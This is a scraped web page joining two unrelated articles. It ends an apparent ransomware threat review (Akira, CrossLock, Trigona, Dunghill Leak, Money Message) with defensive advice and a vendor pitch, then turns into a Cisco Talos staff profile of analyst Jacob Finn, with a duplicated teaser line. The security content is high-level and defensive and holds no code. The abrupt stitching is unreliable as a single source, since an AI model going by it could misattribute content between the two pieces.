Akira demands ransoms from $200,000 to millions of dollars, and it seems they are willing to lower ransom demands for companies that only want to prevent the leaking of stolen data without needing a decryptor.

**CrossLock**

CrossLock is a new ransomware strain using the Go programming language, which makes it more difficult to reverse engineer and boosts its compatibility across platforms. 

The ransomware employs tactics to avoid analysis, such as looking for the WINE environment (to determine if their ransomware is being executed within an analysis or sandbox environment) and tweaking Event Tracing for Windows (ETW) functions (to disrupt the flow of information that security tools and analysts rely on to identify suspicious behavior).

In April, the CrossLock Ransomware Group said they targeted Valid Certificadora, a Brazilian IT & ITES company.

**Trigona**

Trigona ransomware emerged in October 2022 and has targeted various sectors worldwide, including six in April. Operators use tools like NetScan, Splashtop, and Mimikatz to gain access, perform reconnaissance, and gather sensitive information from target systems. They also employ batch scripts to create new user accounts, disable security features, and cover their tracks. 

**Dunghill Leak**

Dunghill Leak is a new ransomware that evolved from the Dark Angels ransomware, which itself came from Babuk ransomware. In April it published the data of two companies, including Incredible Technologies, an American developer and manufacturer of coin-operated video games. The Dunghill Leak gang claims they have access to 500 GB of the company's data, including game files and tax payment reports. Researchers think Dunghill Leak is just a rebranded Dark Angels.

**Money Message**

Money Message is a new ransomware which targets both Windows and Linux systems. In April, criminals used Money Message to hit at least 10 victims, mostly in the US and from various industries. The gang also targeted some big-time companies worth billions of dollars, such as Taiwanese PC parts maker MSI (Micro-Star International).

Money Message uses advanced encryption techniques and leaves a ransom note called "money\_message.log." 

Our Ransomware Emergency Kit contains the information you need to defend against ransomware-as-a-service (RaaS) gangs.

**How to avoid ransomware**

*   **Block common forms of entry.** Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
*   **Prevent intrusions.** Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
*   **Detect intrusions.** Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption.** Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups.** Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Ransomware review: May 2023

Today, Finn combs through Talos’ various intelligence sources, open-source research, partner resources, and Cisco product telemetry to track major attacker trends and emerging threats.

Monday, May 8, 2023 08:05

After working in government for several years, this Talos threat hunter is diving into the dark web

Growing up, Jacob Finn says he wanted to be a detective (or maybe a veterinarian, but there’s still plenty of time for that).

Today with Talos, he’s a detective. And while he’s still hunting for bad actors, instead of combing crime scenes for clues, he’s reading and analyzing dark web forums, leveraging open-source intelligence, and exploiting network telemetry for signs of where adversaries are headed next.

He works on Talos’ Threat Intelligence and Interdiction team as a strategic analyst, which in his words, “looks at the cyber threat landscape from a 30,000-foot view.” A huge part of Finn’s job is writing threat assessments and alerts for intelligence partners, customers, and cyber-attack victims. He’s also a major advocate of public-private partnerships across the cybersecurity ecosystem.

So, it’s fitting that Finn has always had one foot in the public sphere even while transitioning to work in the private sector.

Finn started his cybersecurity career as the Cybersecurity Policy Director for Los Angeles Mayor Eric Garcetti during Garcetti’s second term, working on new intelligence-sharing agreements between L.A. and other major cities with similar security concerns, helping the mayor write cybersecurity-related policies, and advocating for the government to improve its defensive capabilities.

Finn (center) speaking at a panel on behalf of Los Angeles Mayor Eric Garcetti in 2019.

But Finn says he “never expected cybersecurity to be in my long-term plan.”

After receiving his bachelor's degree from the University of California, Los Angeles (UCLA), he attended Reichman University in Herzliya, Israel to receive a master’s in homeland security and counterterrorism, the field he believed he’d make a career of. As part of the curriculum, Finn studied cyberterrorism, which drew him to research how global terrorist organizations use the Internet to advance their operations. He received the offer to advise the mayor in the L.A. Mayor’s Office of Public Safety upon returning home to California.

Finn worked for the Garcetti administration at a time when other major cities like Atlanta were dealing with massive, impactful ransomware attacks. One initiative he led involved working with two of L.A.’s sister cities — Auckland, New Zealand and Guangzhou, China — to establish a multilateral agreement regarding emerging security threats and natural disasters.

Finn (far left) at the signing of an information-sharing agreement between Los Angeles, Auckland, New Zealand and Guangzhou, China in 2019.

“Part of it was devising best practices to protect our communities from major emergencies, which included building mechanisms for information-sharing,” Finn said. “I think this just shows how important cities are in terms of leading the way in security policy and preparation… at the federal government, it’s all about funding and national-level policy, but you don’t actually see how that is implemented at the local level.”

Finn eventually took a job with the U.S. Department of Defense. After years of building expertise in intelligence and national security, he then decided to head into the private sector, applying for a job as a strategic intelligence analyst with Talos.

Today, Finn combs through Talos’ various intelligence sources, open-source research, partner resources, and Cisco product telemetry to track major attacker trends and emerging threats. He has mostly focused on state-sponsored actors and threats stemming from criminal groups.

This research eventually takes the form of public reports, customer alerts, and intelligence that’s shared with Talos’ detection teams to create defensive content for Cisco Secure products. Finn and his team were heavily involved in the creation of Talos’ first-ever Year in Review report, which recapped the major attacker trends in 2022.

Finn brings his public government experience to the role by knowing the importance of information-sharing and what types of security concerns are relevant to practitioners who are tasked with defending municipalities and important public services. But he also had to learn many of the technical skills on the job once he started at Talos — he jokes that he had never opened Terminal on Mac before his first day on the job.

“Everyone at Talos understands that each person comes from different backgrounds with different skills or contributions, and may not have the same level of technical knowledge,” he said. “And now I feel very comfortable using Talos’ different tools to look through datasets such and endpoint logs and other network telemetry.”

Finn still spends a lot of time thinking about the implications of security trends, though, and how that affects the American public.

He recently participated in a pitch competition (think “Shark Tank” but for national security policy) with the Center for the New American Security, a high-profile Washington, D.C. national security think tank. Finn’s idea that he shared with the panel involved a new cybersecurity certification program that private companies could apply for.

Finn’s idea involves a set of standards that private companies could adhere to regarding security measures, verification methods and other cybersecurity protocols they use to protect personal information.

“If a company which sells a service or product involving storage of sensitive data such as PII \[personally identifiable information\] or attorney-client privileged information, you as the consumer want to be satisfied that the company is meeting a certain level of standards so they’re less likely get breached,” Finn said. “This certification program is built on the underlying assumption that companies that are profit-driven, will seek to adopt stronger security standards if consumers are demanding it.”

You can watch Finn’s full pitch to the CNAS panel below.

It’s that type of broader thinking and thought leadership that makes Finn a perfect teammate for the Strategic Analysis team. Rather than diving into the nitty-gritty of a tactical malware campaign or a specific botnet, Finn is taking in information from all directions to try and figure out what’s going to be the next big threat or trend in the security landscape. This all goes to show that researchers with a variety of skillsets can still contribute to Cisco Talos’ defenses.

Tag

#mac